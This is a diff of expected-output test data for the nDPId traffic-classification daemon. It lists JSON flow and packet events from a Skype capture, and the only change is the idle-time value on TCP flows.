00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1LlEAAEARAb\/AqAEinTfrpjLdnE8AIZ69e3cC3u8ghDSSA4Gtev71JCe8ggQmBcfTOg=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -590,8 +590,8 @@ 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLhJoAAEARcpTAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLdIYAAEARgqjAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABArq9AAEAGEE\/AqAEib91KEshDnFkB\/oZbAAAAALAC\/\/94TQAAAgQFtAEDAwUBAQgKPjIXzQAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABArq9AAEAGEE\/AqAEib91KEshDnFkB\/oZbAAAAALAC\/\/94TQAAAgQFtAEDAwUBAQgKPjIXzQAAAAAEAgAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmb4AAEARx3TAqAEiQAQXqzLdnF8ALTBge4UCLJNHDZxrWqKO2le\/27Ln4ZxRCYpxEOdXlle+BhpaiN\/trw=="} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -604,8 +604,8 @@ 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431970672329,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431970672329,"pkt":"AQBeWbwBJKQ8\/kzXCABGwAAgAABAAAECfDnAqAHb6Vm8AZQEAAAWAESk6Vm8AQAAAAAAAAAAAAAAAAAA"} 00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1431970672330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970672330,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIpxZyEOVl6lyAf6GXKASOJAXYAAAAgQFrAQCCApNdqzUPjIXzQEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1431970672330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970672330,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GgdAAEAGpQPAqAEib91KEshDnFkB\/oZclZepc4AQECxtDwAAAQEICj4yGUhNdqzU"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1431970672330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970672330,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIpxZyEOVl6lyAf6GXKASOJAXYAAAAgQFrAQCCApNdqzUPjIXzQEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1431970672330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970672330,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GgdAAEAGpQPAqAEib91KEshDnFkB\/oZclZepc4AQECxtDwAAAQEICj4yGUhNdqzU"} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqkkAAEARTOXAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLc8IAAEARg2zAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -614,12 +614,12 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+TFEAAEARFPLAqAEiQAQXnjLdnFUAKkRXe40CBN0haY4HfyNbFaIJe0md26M72eisE+NIO7kZgnvi7w=="} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673563,"flow_last_seen":1431970673563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673563,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431970673563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673563,"pkt":"0NQSxnP1PBXCt3IOCABFAABApWxAAEAGGZLAqAEib91KEshEAbuPHWWLAAAAALAC\/\/+gUwAAAgQFtAEDAwUBAQgKPjIeFQAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431970673880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970673880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIgG7yEQiaEt4jx1ljKASOJAO\/AAAAgQFrAQCCApNdq5oPjIeFQEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431970673880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673880,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gVFAAEAGPbnAqAEib91KEshEAbuPHWWMImhLeYAQECxk6gAAAQEICj4yH1FNdq5o"} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673966,"flow_last_seen":1431970673966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673966,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431970673966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673966,"pkt":"0NQSxnP1PBXCt3IOCABFAABAY6tAAEAGi8vAqAEi1cezr8hFnF3LCMFlAAAAALAC\/\/+c0QAAAgQFtAEDAwUBAQgKPjIfpgAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673563,"flow_last_seen":1431970673563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673563,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431970673563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673563,"pkt":"0NQSxnP1PBXCt3IOCABFAABApWxAAEAGGZLAqAEib91KEshEAbuPHWWLAAAAALAC\/\/+gUwAAAgQFtAEDAwUBAQgKPjIeFQAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431970673880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970673880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIgG7yEQiaEt4jx1ljKASOJAO\/AAAAgQFrAQCCApNdq5oPjIeFQEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431970673880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673880,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gVFAAEAGPbnAqAEib91KEshEAbuPHWWMImhLeYAQECxk6gAAAQEICj4yH1FNdq5o"} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673966,"flow_last_seen":1431970673966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673966,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431970673966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673966,"pkt":"0NQSxnP1PBXCt3IOCABFAABAY6tAAEAGi8vAqAEi1cezr8hFnF3LCMFlAAAAALAC\/\/+c0QAAAgQFtAEDAwUBAQgKPjIfpgAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vU0AAEARcr7AqAEinTfrqzLdnEYAIOCne48C+j3UCj6Khrhd65pIazZgrSV3BW0j"} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -629,8 +629,8 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VkAAEAR8c7AqAEinTc4jzLdnFIAIGspe5MC1RnFiDDpE1Hd7iM493fNRlWzMToF"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1431970674018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970674018,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxdyEUu77fnywjBZqASOJAmdQAAAgQFrAQCCApO3xkOPjIfpgEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1431970674018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970674018,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ax5AAEAGhGTAqAEi1cezr8hFnF3LCMFmLu+36IAQECx9awAAAQEICj4yH9pO3xkO"} 